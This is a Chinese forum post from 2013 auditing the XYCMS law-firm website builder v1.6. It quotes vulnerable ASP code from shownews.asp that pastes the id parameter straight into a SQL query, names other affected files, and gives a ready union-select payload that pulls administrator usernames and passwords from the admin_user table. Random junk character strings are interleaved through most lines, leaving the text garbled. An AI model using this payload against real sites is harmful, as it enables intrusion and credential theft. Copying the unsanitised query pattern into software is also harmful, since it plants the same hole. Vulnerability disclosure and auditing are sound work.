前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似; F9 I4 M- |" @- q0 J' I
' z, u2 A' I! O9 o9 e
淫荡分割线3 @; P. Z: Z7 J/ J
--------------------------------------------------------
2 l) J' ]& h: ]7 i0 A ; x% y0 N& J' d# S3 X: x
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)1 g. `; M4 d4 a0 @/ u
源码地址:http://down.chinaz.com/soft/29233.htm
$ E4 m! o: `/ k/ z, h
8 {2 ?2 Q* m, u6 P# z漏洞文件:shownews.asp) c( c' `& `4 H% B
漏洞代码:7-13行9 Q7 X0 I, ]: \' r2 I# `$ }
- f+ d' G3 T) Q4 [
! V; Z, o" u1 H* o" j
<% 1 W& b+ p; ^' K! W7 h% B- G
id=request.QueryString("id")$ @% C( [* w4 [; Z$ I! K9 l4 M
! t6 E; |3 |" g2 _$ X; eset snews=server.createobject("adodb.recordset")
+ I$ c: t; ^: N/ Wexec="select * from [news] where id="&id- P5 w1 r+ _6 v: @. i8 m7 @. B
snews.open exec,conn,1,16 P$ D0 k: k; `# m5 s
%>4 h9 v! ?: T+ s f- d
! x C9 N/ q; P7 p) C 2 B7 Y. h2 [4 T7 S" [
什么过滤都没有 直造成注入
- C& g7 n+ ^' p3 ~* s ) S/ V" I [" _/ l P* r( L9 M
注入点:http://127.0.0.1:99/shownews.asp?id=xx
# V; t( ^/ x* j: Q) z. x8 C
1 |; _9 }- J3 K( S其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找9 Z7 c) C* I7 @' W8 f* q4 W
$ q! r$ _. e4 D+ b; [4 P
7 h0 s. }/ h) t: t% N! _$ R$ sexp: union select 1,admin,password,4,5,7 from admin_user2 _( d+ f& m* W, S1 r
6 J- @# s' f9 R1 `! ?3 p |
发表于 2013-4-4 17:28:12
收藏
分享
支持
反对